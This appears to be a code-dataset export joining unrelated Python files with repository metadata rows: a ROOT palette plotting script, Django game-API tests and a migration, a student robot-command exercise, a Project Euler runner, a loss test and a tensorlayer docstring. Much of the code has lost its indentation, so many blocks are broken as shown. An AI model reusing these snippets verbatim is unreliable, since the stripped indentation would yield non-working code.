# Going back in time to 2007 (v5-17-06), here was the origin palette
# Note the typo in entry 48: 112 (pink) not 2 (red)
# https://github.com/root-project/root/blob/9294cc60a9a70dece4f24f0bc0399cc00c0f78b5/base/src/TStyle.cxx#L1445-L1449
# The commit of the fix:
# https://github.com/root-project/root/commit/d3e92e5de7e76c1ded2af7218adc9bc20b7f0c9f
PALETTE07 = list(PALETTE)
PALETTE07[-2] = 5 # typo was 112, but end up being magenta
# These are the basic root colors.
# https://github.com/root-project/root/blob/2762a32343f57664b42558cd3af4031fe2f4f086/core/base/src/TColor.cxx#L1077
# This list was generated with:
# for (int i=1; i<51; i++) {gROOT->GetColor()->Print; }
TCOLORS = [
(1.000000, 1.000000, 1.000000), # Name=background
(0.000000, 0.000000, 0.000000), # Name=black
(1.000000, 0.000000, 0.000000), # Name=red
(0.000000, 1.000000, 0.000000), # Name=green
(0.000000, 0.000000, 1.000000), # Name=blue
(1.000000, 0.000000, 1.000000), # Name=magenta
(0.000000, 1.000000, 0.800000), # Name=teal
(1.000000, 0.800000, 0.000000), # Name=orange
(0.350000, 0.830000, 0.330000), # Name=Color8
(0.350000, 0.330000, 0.850000), # Name=Color9
(0.999000, 0.999000, 0.999000), # Name=white
(0.754000, 0.715000, 0.676000), # Name=editcol
(0.300000, 0.300000, 0.300000), # Name=grey12
(0.400000, 0.400000, 0.400000), # Name=grey13
(0.500000, 0.500000, 0.500000), # Name=grey14
(0.600000, 0.600000, 0.600000), # Name=grey15
(0.700000, 0.700000, 0.700000), # Name=grey16
(0.800000, 0.800000, 0.800000), # Name=grey17
(0.900000, 0.900000, 0.900000), # Name=grey18
(0.950000, 0.950000, 0.950000), # Name=grey19
(0.800000, 0.780000, 0.670000), # Name=Color20
(0.800000, 0.780000, 0.670000), # Name=Color21
(0.760000, 0.750000, 0.660000), # Name=Color22
(0.730000, 0.710000, 0.640000), # Name=Color23
(0.700000, 0.650000, 0.590000), # Name=Color24
(0.720000, 0.640000, 0.610000), # Name=Color25
(0.680000, 0.600000, 0.550000), # Name=Color26
(0.610000, 0.560000, 0.510000), # Name=Color27
(0.530000, 0.400000, 0.340000), # Name=Color28
(0.690000, 0.810000, 0.780000), # Name=Color29
(0.520000, 0.760000, 0.640000), # Name=Color30
(0.540000, 0.660000, 0.630000), # Name=Color31
(0.510000, 0.620000, 0.550000), # Name=Color32
(0.680000, 0.740000, 0.780000), # Name=Color33
(0.480000, 0.560000, 0.600000), # Name=Color34
(0.460000, 0.540000, 0.570000), # Name=Color35
(0.410000, 0.510000, 0.590000), # Name=Color36
(0.430000, 0.480000, 0.520000), # Name=Color37
(0.490000, 0.600000, 0.820000), # Name=Color38
(0.500000, 0.500000, 0.610000), # Name=Color39
(0.670000, 0.650000, 0.750000), # Name=Color40
(0.830000, 0.810000, 0.530000), # Name=Color41
(0.870000, 0.730000, 0.530000), # Name=Color42
(0.740000, 0.620000, 0.510000), # Name=Color43
(0.780000, 0.600000, 0.490000), # Name=Color44
(0.750000, 0.510000, 0.470000), # Name=Color45
(0.810000, 0.370000, 0.380000), # Name=Color46
(0.670000, 0.560000, 0.580000), # Name=Color47
(0.650000, 0.470000, 0.480000), # Name=Color48
(0.580000, 0.410000, 0.440000), # Name=Color49
(0.830000, 0.350000, 0.330000), # Name=Color50
]
root_cmap = matplotlib.colors.ListedColormap([TCOLORS[i] for i in PALETTE])
root_cmap.set_over(TCOLORS[PALETTE[-1]]);
root_cmap.set_under(TCOLORS[PALETTE[0]])
root07_cmap = matplotlib.colors.ListedColormap([TCOLORS[i] for i in PALETTE07])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description=__doc__)
args = parser.parse_args()
import numpy as np
import pylab as plt
from mpl_toolkits.mplot3d import Axes3D
    def fn(x, y):
        # demo surface: peaks at 1.1 at (2, 2); equals 0.1 wherever either
        # quadratic factor vanishes (x or y at distance 1 from 2)
        return 0.1+(1-(x-2)*(x-2))*(1-(y-2)*(y-2))
xx,yy = np.meshgrid(np.linspace(1,3,1000),np.linspace(1,3,1000))
plt.figure(figsize=(6,4))
levels = np.arange(0.1,1.2,0.1)
plt.contourf(xx,yy,fn(xx,yy),levels,vmin=0.07,vmax=1.05,cmap=root_cmap)
plt.colorbar(ticks=levels,pad=0.01,aspect=10)
plt.subplots_adjust(left=0.08,right=0.99)
""" Equivalent in ROOT:
TCanvas *c1 = new TCanvas("c1","c1",0,0,600,400);
TF2 *f1 = new TF2("f1","0.1+(1-(x-2)*(x-2))*(1-(y-2)*(y-2))",1,3,1,3);
f1->SetNpx(1000);
f1->SetNpy(1000);
Double_t levels[] = {0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1};
f1->SetContour(10,levels);
gStyle->SetPalette(-1);
f1->Draw("colz")
"""
fig = plt.figure(figsize=(6,4))
ax = fig.add_subplot(111, projection='3d')
im = ax.plot_surface(xx,yy,fn(xx,yy),vmin=0.1,vmax=1.09,cmap=root_cmap)
plt.colorbar(im,ticks=np.arange(0,1.2,0.1))
"""
TCanvas *c2 = new TCanvas("c2","c2",0,0,600,400);
f1->SetContour(20);
f1->SetNpx(20);
f1->SetNpy(20)
f1->Draw("surf1z");
"""
| [
"[email protected]"
] | |
fe9df61a2e258863b6e2aee9719643e854ebe04c | 11ff5d1651b1a3972de8d7fe369943166cb1e8dd | /lab9/backend_squares/squares/squares_app/tests/e2e/test_e2e.py | 3c2864a8f70764ecee0fdd0d4badaa97762aeee1 | [] | no_license | ilyalevushkin/computer_networks | b0eb4fa1d20a381480b6b278c01a753a98bf23ee | 3fc63850ef27779404b8d3fd054f194b78c7ee21 | refs/heads/main | 2023-05-25T11:19:06.055725 | 2021-06-16T12:58:12 | 2021-06-16T12:58:12 | 316,938,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,684 | py | from http import HTTPStatus
from django.test import TestCase
import os
from copy import deepcopy
import json
from django.contrib.auth.models import User
from ...models import Users, PullPlayers, Games
class GameWithPoolUserTest(TestCase):
@classmethod
def setUpTestData(cls):
#arrange
cls.passed = 0
cls.user1_data = {'User': {
'user': {
'username': 'den',
'first_name': 'denis',
'last_name': 'reling',
'email': '[email protected]',
'password': '123'
},
'phone': '1111111',
'about': 'infoooooo'
}}
cls.login_data1 = {'User_signin': {
'username': cls.user1_data['User']['user']['username'],
'password': cls.user1_data['User']['user']['password']
}}
cls.user2_data = {'User': {
'user': {
'username': 'den2',
'first_name': 'denis2',
'last_name': 'reling2',
'email': '[email protected]',
'password': '123'
},
'phone': '11111112',
'about': 'infoooooo2'
}}
cls.login_data2 = {'User_signin': {
'username': cls.user2_data['User']['user']['username'],
'password': cls.user2_data['User']['user']['password']
}}
cls.game_data = {'Game': {
'player_1_id': None,
'player_2_id': None,
'game_state': {
'turn': '1',
'columns': 1,
'rows': 2,
'table_with_chips': '00'
}
}}
cls.patch_data = {
'Game_state_update': {
'column_pos': 0,
'row_pos': None,
'value': ''
}
}
    def passedPercent(self):
        # Report "passed/total" run counts. NOTE(review): despite the name
        # this prints a fraction of runs, not a percentage.
        print(f'{self.passed}/{self.n}')
def create_user(self, person):
data = self.user1_data
if person == 2:
data = self.user2_data
response = self.client.post('/api/v1/users/signup', data=json.dumps(data),
content_type='application/json')
return response
def login_user(self, person):
data = self.login_data1
if person == 2:
data = self.login_data2
response = self.client.post('/api/v1/users/signin', data=json.dumps(data),
content_type='application/json')
return response
def get_user_info(self, person, token):
data = self.get_user_by_username(self.user1_data['User']['user']['username'])
if person == 2:
data = self.get_user_by_username(self.user2_data['User']['user']['username'])
response = self.client.get('/api/v1/users/' + str(data.pk), HTTP_AUTHORIZATION=('Token ' + token))
return response
def search_users_in_pull(self, token):
return self.client.get('/api/v1/pull_players', HTTP_AUTHORIZATION=('Token ' + token))
def add_user_in_pull(self, token):
return self.client.post('/api/v1/pull_players', HTTP_AUTHORIZATION=('Token ' + token))
def start_game(self, person_by, first_turn, token):
data = self.game_data
data['Game']['game_state']['turn'] = str(first_turn)
data['Game']['player_2_id'] = self.get_user_by_username(self.user1_data['User']['user']['username']).pk
data['Game']['player_1_id'] = self.get_user_by_username(self.user2_data['User']['user']['username']).pk
if person_by == 2:
data['Game']['player_2_id'], data['Game']['player_1_id'] = data['Game']['player_1_id'], \
data['Game']['player_2_id']
return self.client.post('/api/v1/games', data=json.dumps(data),
content_type='application/json', HTTP_AUTHORIZATION=('Token ' + token))
def get_game_by_user(self, person_by, token):
user = self.get_user_by_username(self.user1_data['User']['user']['username'])
if person_by == 2:
user = self.get_user_by_username(self.user2_data['User']['user']['username'])
return self.client.get('/api/v1/games/users/' + str(user.pk) + '?active=1', HTTP_AUTHORIZATION=('Token ' + token))
    def make_turn(self, game_id, position, person, token):
        """PATCH a single move (row `position` by player `person`) into the game.

        NOTE(review): this mutates the shared class-level `patch_data`
        template in place rather than a copy — fine while tests run
        sequentially, but worth confirming.
        """
        data = self.patch_data
        data['Game_state_update']['row_pos'] = position
        data['Game_state_update']['value'] = str(person)
        return self.client.patch('/api/v1/games/' + str(game_id), data=json.dumps(data),
                                 content_type='application/json', HTTP_AUTHORIZATION=('Token ' + token))
def logout_user(self, token):
return self.client.get('/api/v1/users/signout', HTTP_AUTHORIZATION=('Token ' + token))
    def get_user_by_username(self, username):
        # Fetch the Users profile row whose related auth user has this username.
        return Users.objects.get(user__username=username)
def test_live(self):
self.n = int(os.getenv('TEST_REPEATS', 100))
self.passed = 0
for i in range(self.n):
self.__test_live()
self.passedPercent()
def __test_live(self):
# create 2 users
# act
response = self.create_user(person=1)
#assert
self.assertEqual(response.status_code, HTTPStatus.CREATED)
self.assertEqual(self.get_user_by_username(self.user1_data['User']['user']['username']).user.username,
self.user1_data['User']['user']['username'])
#act
response = self.create_user(person=2)
# assert
self.assertEqual(response.status_code, HTTPStatus.CREATED)
self.assertEqual(self.get_user_by_username(self.user2_data['User']['user']['username']).user.username,
self.user2_data['User']['user']['username'])
# login user1 and user2
#act
response = self.login_user(person=1)
user1_token = response.data['Token']
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
#act
response = self.login_user(person=2)
user2_token = response.data['Token']
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
# search info about user1 and user2
#act
response = self.get_user_info(person=1, token=user1_token)
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['User']['user']['username'], self.user1_data['User']['user']['username'])
# act
response = self.get_user_info(person=2, token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['User']['user']['username'], self.user2_data['User']['user']['username'])
# search users in pull by user1
#act
response = self.search_users_in_pull(token=user1_token)
#assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(len(response.data['Pull_players']), 0)
# add user1 to pull
# act
response = self.add_user_in_pull(token=user1_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.CREATED)
# search users in pull by user2
# act
response = self.search_users_in_pull(token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(len(response.data['Pull_players']), 1)
self.assertEqual(response.data['Pull_players'][0]['player']['user']['username'],
self.user1_data['User']['user']['username'])
# start game with user1 by user2
# act
response = self.start_game(person_by=2, first_turn=2, token=user2_token)
user2_game_id = response.data['Game']['id']
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['game_state']['table_with_chips'],
self.game_data['Game']['game_state']['table_with_chips'])
# get game_info by user1
# act
response = self.get_game_by_user(person_by=1, token=user1_token)
user1_game_id = response.data['Game']['id']
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['player_1']['user']['username'],
self.user1_data['User']['user']['username'])
self.assertEqual(response.data['Game']['player_2']['user']['username'],
self.user2_data['User']['user']['username'])
self.assertEqual(response.data['Game']['game_state']['turn'], '2')
self.assertEqual(user1_game_id, user2_game_id)
# user2 make turn
# act
response = self.make_turn(game_id=user2_game_id, position=0, person=2, token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['game_state']['table_with_chips'], '20')
self.assertEqual(response.data['Game']['game_state']['turn'], '1')
self.assertEqual(response.data['Game']['game_state']['status'], '-1')
# user1 make turn and tied
# act
response = self.make_turn(game_id=user2_game_id, position=1, person=1, token=user1_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
self.assertEqual(response.data['Game']['game_state']['table_with_chips'], '21')
self.assertEqual(response.data['Game']['game_state']['turn'], '2')
self.assertEqual(response.data['Game']['game_state']['status'], '0')
# logout user1 and user2
# act
response = self.logout_user(token=user1_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
# act
response = self.logout_user(token=user2_token)
# assert
self.assertEqual(response.status_code, HTTPStatus.OK)
# проверка, вышли ли users
# act
response = self.logout_user(token=user1_token)
# assert
self.assertNotEqual(response.status_code, HTTPStatus.OK)
# act
response = self.logout_user(token=user2_token)
# assert
self.assertNotEqual(response.status_code, HTTPStatus.OK)
# Total
self.passed += 1
# Cleanup
Games.objects.all().delete()
PullPlayers.objects.all().delete()
Users.objects.all().delete()
User.objects.all().delete()
| [
"[email protected]"
] | |
2bae6e3b66955458f062196496992f4f9b1a1513 | 99c4d4a6592fded0e8e59652484ab226ac0bd38c | /code/batch-2/dn9 - minobot/M-17068-2501.py | 51567abcbd0bb9da09e40e7d35ee022e3cb5716c | [] | no_license | benquick123/code-profiling | 23e9aa5aecb91753e2f1fecdc3f6d62049a990d5 | 0d496d649247776d121683d10019ec2a7cba574c | refs/heads/master | 2021-10-08T02:53:50.107036 | 2018-12-06T22:56:38 | 2018-12-06T22:56:38 | 126,011,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,142 | py | def premik(ukaz, x, y, smer):
smeri = "NESW"
premiki = [(0, -1), (1, 0), (0, 1), (-1, 0)]
ismer = smeri.index(smer)
if ukaz == "R":
smer = smeri[(ismer + 1) % 4]
elif ukaz == "L":
smer = smeri[(ismer - 1) % 4]
else:
dx, dy = premiki[ismer]
x += dx * ukaz
y += dy * ukaz
return x, y, smer
def angleski(ime_datoteke):
    """Translate Slovenian robot commands from a file into English tokens.

    Tokens starting with "D" (desno) become "R", those starting with "L"
    (levo) stay "L", and "N" (naprej) is replaced by the distance token
    that follows it.  Returns the list of "R"/"L"/distance-string tokens.
    """
    # with-statement closes the file even on error (the original leaked the
    # handle); "utf-8" is the canonical codec spelling ("utf - 8" only
    # worked via codec-name normalization).
    with open(ime_datoteke, encoding="utf-8") as t:
        s = t.read().split()
    popsez = []
    for i, x in enumerate(s):
        if x[0] == "D":
            popsez.append("R")
        if x[0] == "L":
            popsez.append(x[0])
        if x[0] == "N":
            popsez.append(s[i + 1])
    return popsez
def izvedi(ime_datoteke):
    """Run the command file and return every intermediate robot state.

    Starts at (0, 0) facing "N" and returns a list of (x, y, heading)
    tuples — the initial state plus one entry per executed command.
    """
    x, y, smer = 0, 0, "N"
    stanja = [(x, y, smer)]
    for e in angleski(ime_datoteke):
        # turn commands stay strings, move commands become distances
        ukaz = e if e in ("R", "L") else int(e)
        # compute the next state once (the original called premik twice
        # per command with identical arguments)
        x, y, smer = premik(ukaz, x, y, smer)
        stanja.append((x, y, smer))
    return stanja
def opisi_stanje(x, y, smer):
    """Format one robot state as right-aligned x, left-aligned y and a
    right-aligned heading glyph (^ > v <)."""
    glyphs = dict(zip("NESW", "^>v<"))
    return "{:>3}:{:<3}{:>2}".format(x, y, glyphs[smer])
def prevedi(ime_vhoda, ime_izhoda):
    """Execute the command file `ime_vhoda` and write one formatted state
    per line (via opisi_stanje) to `ime_izhoda`."""
    # with-statement guarantees the output file is closed even if a write
    # fails (the original only closed it on the happy path)
    with open(ime_izhoda, "w") as t:
        for x, y, smer in izvedi(ime_vhoda):
            t.write(opisi_stanje(x, y, smer) + "\n")
def opisi_stanje_2(x, y, smer):
    """Format one robot state as '<glyph><pad>(x:y)'.

    The heading glyph is left-padded so glyph + padding occupies
    5 - len(str(x)) characters (minimum 1), keeping the opening
    parenthesis column aligned regardless of x's digit count.

    The original hard-coded three digit-count branches and mishandled
    the boundaries: x == 99 fell into the one-digit branch (width 4)
    and x <= -10 into the two-digit branch (width 3).  Deriving the
    width from len(str(x)) fixes both while leaving every other input's
    output byte-identical.
    """
    s = {"N": "^", "E": ">", "S": "v", "W": "<"}
    width = max(1, 5 - len(str(x)))
    return "{:<{w}}({}:{})".format(s[smer], x, y, w=width)
import unittest
class TestObvezna(unittest.TestCase):
def test_branje(self):
self.assertEqual(
izvedi("primer.txt"),
[(0, 0, 'N'), (0, 0, 'E'), (12, 0, 'E'), (12, 0, 'S'), (12, 2, 'S'),
(12, 2, 'E'), (15, 2, 'E'), (15, 2, 'N'), (15, 2, 'W')]
)
self.assertEqual(
izvedi("ukazi.txt"),
[(0, 0, 'N'), (0, 0, 'E'), (1, 0, 'E'), (1, 0, 'S'), (1, 0, 'W'),
(0, 0, 'W'), (0, 0, 'S'), (0, 0, 'E'), (1, 0, 'E'), (1, 0, 'S'),
(1, 3, 'S'), (1, 3, 'E'), (2, 3, 'E'), (2, 3, 'S'), (2, 3, 'W')]
)
def test_opisi_stanje(self):
self.assertEqual(opisi_stanje(0, 12, "N"), " 0:12 ^")
self.assertEqual(opisi_stanje(111, 0, "E"), "111:0 >")
self.assertEqual(opisi_stanje(-2, 111, "S"), " -2:111 v")
self.assertEqual(opisi_stanje(0, 0, "W"), " 0:0 <")
def test_prevedi(self):
from random import randint
import os
ime = "izhod{:05}.txt".format(randint(0, 99999))
try:
self.assertIsNone(prevedi("primer.txt", ime))
self.assertEqual(open(ime).read().rstrip(), """ 0:0 ^
0:0 >
12:0 >
12:0 v
12:2 v
12:2 >
15:2 >
15:2 ^
15:2 <""")
self.assertIsNone(prevedi("ukazi.txt", ime))
self.assertEqual(open(ime).read().rstrip(), """ 0:0 ^
0:0 >
1:0 >
1:0 v
1:0 <
0:0 <
0:0 v
0:0 >
1:0 >
1:0 v
1:3 v
1:3 >
2:3 >
2:3 v
2:3 <""")
finally:
os.remove(ime)
vime = "vhod{:05}.txt".format(randint(0, 99999))
open(vime, "wt").write("NAPREJ 23\nLEVO\nNAPREJ 17\n")
try:
self.assertIsNone(prevedi(vime, ime))
self.assertEqual(open(ime).read().rstrip(), """ 0:0 ^
0:-23 ^
0:-23 <
-17:-23 <""")
finally:
os.remove(ime)
os.remove(vime)
class TestDodatna(unittest.TestCase):
def test_opisi_stanje(self):
self.assertEqual(opisi_stanje_2(0, 12, "N"), "^ (0:12)")
self.assertEqual(opisi_stanje_2(111, 0, "E"), "> (111:0)")
self.assertEqual(opisi_stanje_2(-2, 111, "S"), "v (-2:111)")
self.assertEqual(opisi_stanje_2(0, 0, "W"), "< (0:0)")
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
7157050d8baaafca99fac5e26a9089f52b26636c | b2e9e3db0202a6bd06b5d1f4c4fd3369b5260261 | /python/tests.py | db2473b8cd480c38936c4f0a6c01bddbac30db5c | [] | no_license | jackmoody11/project-euler-solutions | 66e7128cae130499ce518c2008e5df91a6883a68 | 8b6e00bfac7855f5c892f5b3094415935358cb98 | refs/heads/master | 2020-04-12T23:52:57.347142 | 2020-01-10T00:23:16 | 2020-01-10T00:23:16 | 162,831,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,600 | py | import importlib
import time
import doctest
import sys
import argparse
filename = "../answers.txt"
with open(filename, 'r') as f:
lines = [line.strip() for line in f.readlines()]
ANSWERS = {int(line.split(". ")[0]):
line.split(". ")[1] for line in lines}
def test(prob, expected):
    """Run Project-Euler problem `prob`'s compute() and time it.

    Imports module p{prob:03d}, compares its integer result against
    `expected`, prints a pass/fail line and returns the elapsed wall-clock
    time in milliseconds.  Raises ImportError if the solution module is
    missing.
    """
    try:
        module = importlib.import_module("p{:03d}".format(prob))
    except ImportError:
        raise ImportError(
            "It looks like you haven't solved #{prob} yet".format(prob=prob))
    start = time.time()
    actual = int(module.compute()) # Must return an int
    elapsed = int((time.time() - start) * 1000)
    # the elapsed time is reported even when the answer is wrong
    print("Problem {:03d}: {:7d} ms".format(
        prob, elapsed),
        "" if actual == expected else " *** FAIL ***")
    return elapsed
def get_args():
    """Parse command-line options.

    Positional ``numbers`` selects which problems to run (empty = all);
    ``--graph`` plots timings afterwards; ``--doctest`` runs the utils
    doctests. Reads ``sys.argv``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('numbers', type=int, nargs='*')
    parser.add_argument('-g', '--graph', action='store_true',
                        help='graph execution time for selected problems')
    parser.add_argument('--doctest', action='store_true',
                        help='run doctests on utils')
    args = parser.parse_args()
    return args
def main(doctests=False):
    """Run the selected (or all) solved problems and report timings.

    Parameters:
        doctests: when True, run the utils doctests even if ``--doctest``
            was not passed on the command line. (Bug fix: this parameter
            used to be accepted but silently ignored.)
    """
    args = get_args()
    results = dict()
    if args.numbers:  # truthiness instead of len(...) > 0
        for prob in args.numbers:
            try:
                # Keep the try body to just the lookup so a KeyError raised
                # inside a solution's compute() is not misreported as a
                # missing answers.txt entry.
                expected = ANSWERS[prob]
            except KeyError:
                raise KeyError(
                    "It looks like you haven't added #{prob} to answers.txt yet".format(prob=prob))
            results[prob] = test(prob, expected)
        num_probs = len(args.numbers)
        prob_names = ", ".join(map(str, args.numbers))
    else:
        for (prob, expected) in sorted(ANSWERS.items()):
            results[prob] = test(prob, expected)
        num_probs = len(ANSWERS)
        prob_names = "(all)"
    total_time = sum(results.values())
    print("Total computation time: {} secs".format(total_time / 1000))
    print("{} problems solved".format(num_probs))
    # Honor both the CLI flag and the keyword argument.
    if args.doctest or doctests:
        doctesting()
    if args.graph:
        graph(results, prob_names)
def doctesting():
    """Run the doctests embedded in the local ``utils`` module.

    Always returns 0; doctest results are printed verbosely.
    """
    import utils
    doctest.testmod(utils, verbose=True)
    return 0
def graph(data, probs):
    """Show a bar chart of per-problem execution times.

    data: mapping of problem number -> elapsed milliseconds.
    probs: human-readable description of which problems were run
        (used in the chart title).
    NOTE(review): rc('text', usetex=True) requires a working LaTeX
    install; the title says "secs" but values are milliseconds -- confirm.
    """
    import matplotlib.pyplot as plt
    from matplotlib import rc
    rc('text', usetex=True)
    plt.bar(data.keys(), data.values())
    plt.title(
        'Execution Time (secs) for Project Euler Problems {0}'.format(probs))
    plt.xlabel('Project Euler Problem Number')
    plt.ylabel('Execution Time (ms)')
    plt.show()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
714d966a83c3c2a5e4206edcffebd91a7fd93889 | d0cdcbe3471cc980809fd4ed5182385bb23216b5 | /backend/task_profile/migrations/0001_initial.py | 79a56729aed9aebe14923d104aef369745363a4a | [] | no_license | crowdbotics-apps/strippee-19912 | 4770d421f16389e3ada580018e52385094cedf00 | 16d1d6258dca231fb157ecb3fa6709f490a5c1fc | refs/heads/master | 2022-12-09T22:53:07.670289 | 2020-09-01T20:24:27 | 2020-09-01T20:24:27 | 292,099,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,239 | py | # Generated by Django 2.2.16 on 2020-09-01 20:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial schema for the task_profile app.

    Creates TaskerProfile, Notification, InviteCode and CustomerProfile,
    each linked to the project's AUTH_USER_MODEL. Do not hand-edit field
    definitions; generate a follow-up migration instead.
    """
    initial = True
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]
    operations = [
        migrations.CreateModel(
            name='TaskerProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mobile_number', models.CharField(max_length=20)),
                ('photo', models.URLField()),
                ('timestamp_created', models.DateTimeField(auto_now_add=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('last_login', models.DateTimeField(blank=True, null=True)),
                ('description', models.TextField(blank=True, null=True)),
                ('city', models.CharField(blank=True, max_length=50, null=True)),
                ('vehicle', models.CharField(blank=True, max_length=50, null=True)),
                ('closing_message', models.TextField(blank=True, null=True)),
                ('work_area_radius', models.FloatField(blank=True, null=True)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='taskerprofile_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Notification',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('type', models.CharField(max_length=20)),
                ('message', models.TextField()),
                ('timestamp_created', models.DateTimeField(auto_now_add=True)),
                ('user', models.ManyToManyField(related_name='notification_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='InviteCode',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=20)),
                ('timestamp_created', models.DateTimeField(auto_now_add=True)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invitecode_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='CustomerProfile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('mobile_number', models.CharField(max_length=20)),
                ('photo', models.URLField()),
                ('timestamp_created', models.DateTimeField(auto_now_add=True)),
                ('last_updated', models.DateTimeField(auto_now=True)),
                ('last_login', models.DateTimeField(blank=True, null=True)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='customerprofile_user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"[email protected]"
] | |
d53072873c3a5166c4017a13617ff165c8605c46 | 5c89f7c8ad6213b8c194c6e45424db199ef31041 | /s5/1.5.1_operaciones_aritmeticas_input copy.py | d4c5cd82e4a065d1b2e3730e75c9ea76506033c8 | [] | no_license | camohe90/mision_tic_G6 | 1ccfe5eef6094a1bc0dc6ca5debf2c7a9e959121 | bc04a468a568b5972b29e40643799cd9848219d8 | refs/heads/master | 2023-05-29T14:26:53.946013 | 2021-06-09T14:44:59 | 2021-06-09T14:44:59 | 366,415,146 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 535 | py | numero1 = int(input("ingrese numero 1: "))
numero2 = int(input("ingrese numero 2: "))
# Addition
suma = numero1 + numero2
print(suma)
print(type(suma))
# Subtraction
resta = numero1 - numero2
print(resta)
print(type(resta))
# Multiplication
multiplicacion = numero1 * numero2
print(multiplicacion)
print(type(multiplicacion))
# True division -- always yields a float, even for whole results
division = numero1 / numero2
print(division)
print(type(division))
# Floor division -- int result, rounds toward negative infinity
division_entera = numero1 // numero2
print(division_entera)
print(type(division_entera))
# Modulo (remainder)
modulo = numero1 % numero2
print(modulo)
print(type(modulo))
"[email protected]"
] | |
9494c14281d52325c997fa672d79c0f65cd32d67 | 92436a50cc26c8c8a216ba6d4a62e36069614234 | /test/losses_multi_output_sum_loss_test.py | 1bd83488fc1d642aace065a621b9b116176498fb | [
"MIT"
] | permissive | hahaxun/ClassyVision | 9341f4e6849c858094592052f3df111c13d1a91d | b3f714ef94275b3e9753ab3f3c8256cb852b96fc | refs/heads/master | 2021-08-17T07:42:34.402613 | 2021-03-08T08:50:01 | 2021-03-08T08:50:01 | 245,940,574 | 1 | 0 | MIT | 2021-03-08T08:50:01 | 2020-03-09T04:02:59 | Python | UTF-8 | Python | false | false | 1,176 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import torch
from classy_vision.losses import (
ClassyLoss,
MultiOutputSumLoss,
build_loss,
register_loss,
)
@register_loss("mock_1")
class MockLoss1(ClassyLoss):
    """Trivial stub loss that always evaluates to 1.0, ignoring its inputs."""
    def forward(self, pred, target):
        # Constant value lets the test below reason about summed totals exactly.
        return torch.tensor(1.0)
    @classmethod
    def from_config(cls, config):
        # This mock takes no configuration options.
        return cls()
class TestMultiOutputSumLoss(unittest.TestCase):
    def test_multi_output_sum_loss(self):
        """MultiOutputSumLoss sums the wrapped loss over each model output."""
        config = {"name": "multi_output_sum_loss", "loss": {"name": "mock_1"}}
        crit = build_loss(config)
        self.assertTrue(isinstance(crit, MultiOutputSumLoss))
        # test with a single output: just the wrapped loss (mock returns 1.0)
        output = torch.tensor([1.0, 2.3])
        target = torch.tensor(1.0)
        self.assertAlmostEqual(crit(output, target).item(), 1.0)
        # test with a list of outputs: 5 outputs x 1.0 each = 5.0
        output = [torch.tensor([1.2, 3.2])] * 5
        target = torch.tensor(2.3)
        self.assertAlmostEqual(crit(output, target).item(), 5.0)
| [
"[email protected]"
] | |
ef4e6cc1b28a2ca6361fa63d714a9dabbaeca22d | f07a42f652f46106dee4749277d41c302e2b7406 | /Test Set/Open Source Projects/tensorlayer/0e46845d609c2ce2eeee19cf69ed2a8b14bfdacd-0-fix.py | 9c842d7bd821cd42159e6b32ab37a1fd196b4887 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66,584 | py | # -*- coding: utf-8 -*-
"""
A collection of helper functions to work with datasets.
Load benchmark dataset, save and restore model, save and load variables.
TensorFlow provides ``.ckpt`` file format to save and restore the models, while
we suggest to use standard python file format ``.npz`` to save models for the
sake of cross-platform.
.. code-block:: python
## save model as .ckpt
saver = tf.train.Saver()
save_path = saver.save(sess, "model.ckpt")
# restore model from .ckpt
saver = tf.train.Saver()
